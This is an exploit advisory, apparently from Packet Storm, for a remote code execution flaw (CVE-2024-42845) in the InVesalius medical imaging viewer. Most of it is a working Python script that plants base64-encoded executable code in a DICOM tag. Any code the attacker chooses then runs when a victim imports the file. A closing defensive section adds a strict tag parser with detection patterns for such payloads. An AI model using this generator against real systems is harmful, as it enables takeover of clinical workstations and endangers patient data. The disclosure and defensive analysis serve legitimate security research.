Invesalius 3.1 Remote Code Execution

Invesalius versions 3.1.99991 through 3.1.99998 suffer from a remote code execution vulnerability. Exploitation relies on a specially crafted DICOM file that, once imported into the victim's InVesalius client application, gives an attacker remote code execution.

Packet Storm
# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)
# Discovered By: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)
# Exploit Author: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)
# Vendor Homepage: https://invesalius.github.io/
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: 3.1.99991 to 3.1.99998
# Tested on: Windows
# CVE-ID: CVE-2024-42845
# External references: https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan, https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845

###
# exploit to create the malicious DICOM file
###

import pydicom
import base64
import argparse

pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE

def encode_payload(plain_payload):
    data = open(plain_payload, 'rb').read()
    return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"

def prepare_dicom_payload(dicom_file_path, sign, payload):
    try:
        dicom_data = pydicom.dcmread(dicom_file_path)
        if sign:
            dicom_data.Manufacturer = "Malicious DICOM file creator"
            dicom_data.InstitutionName = "Malicious DICOM file institution"
        values = dicom_data[0x0020, 0x0032].value
        mal = [str(i) for i in values]
        mal.append(encode_payload(payload))

    except pydicom.errors.InvalidDicomError:
        print("The file is not a valid DICOM file.")
    except Exception as e:
        print(f"An error occurred: {e}")

    return mal

def modify_dicom_field(dicom_file_path, malicious_tag, outfile):
    try:
        dicom_dataset = pydicom.dcmread(dicom_file_path)
        elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag)
        dicom_dataset[0x00200032] = elem
        print(dicom_dataset)
        dicom_dataset.save_as(outfile)
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Read a DICOM file.')
    parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')
    parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')
    parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code')
    parser.add_argument('--signature', required=False, default=True)

    args = parser.parse_args()
    dicom_infile_path = args.dicom
    dicom_outfile_path = args.outfile

    tmp_tag = prepare_dicom_payload(dicom_infile_path, sign=args.signature, payload=args.payload)
    if tmp_tag:
        malicious_tag = '\\'.join(tmp_tag)
        modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path)
        exit(0)
    else:
        exit(1)
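The script above appends its payload as a fourth backslash-separated component of Image Position (Patient) (0020,0032), a tag that per the DICOM standard holds exactly three Decimal String (DS) values. The following defensive check is an added example, not code from the advisory or from InVesalius: it parses that tag with the DS grammar only, so an importer built on it rejects such a file instead of ever evaluating the tag text. The sample values are constructed; the crafted one mirrors the exploit's default `print('Test')` payload.

```python
import re
from typing import List, Tuple

# DICOM DS grammar (PS3.5): optional sign, digits with optional decimal point,
# optional exponent, at most 16 characters, space-padded.
_DS_RE = re.compile(r"[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?")

# Constructed samples: a benign value and one shaped like the exploit's output.
BENIGN = "-125.0\\-125.0\\1.5"
CRAFTED = ("-125.0\\-125.0\\1.5\\"
           "exec(__import__('base64').b64decode(b'cHJpbnQoJ1Rlc3QnKQ=='))")


def parse_ds(component: str) -> float:
    """Parse one DS component strictly; raise ValueError on anything else."""
    s = component.strip(" ")
    if len(s) > 16 or not _DS_RE.fullmatch(s):
        raise ValueError(f"not a DICOM DS value: {component[:40]!r}")
    return float(s)


def parse_image_position(raw: str) -> Tuple[float, float, float]:
    """Strict parser for (0020,0032): exactly three DS components."""
    parts = raw.split("\\")
    if len(parts) != 3:
        raise ValueError(f"expected 3 components, got {len(parts)}")
    x, y, z = (parse_ds(p) for p in parts)
    return (x, y, z)


def inspect_image_position(raw: str) -> List[str]:
    """Triage helper: return findings for a raw (0020,0032) string (empty = clean)."""
    findings = []
    parts = raw.split("\\")
    if len(parts) != 3:
        findings.append(f"component count {len(parts)} != 3")
    for i, p in enumerate(parts):
        try:
            parse_ds(p)
        except ValueError:
            findings.append(f"component {i} is not a decimal string: {p[:40]!r}")
        if re.search(r"exec\(|eval\(|__import__|b64decode", p):
            findings.append(f"component {i} contains Python code markers")
    return findings


if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(label, inspect_image_position(raw) or "clean")
```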
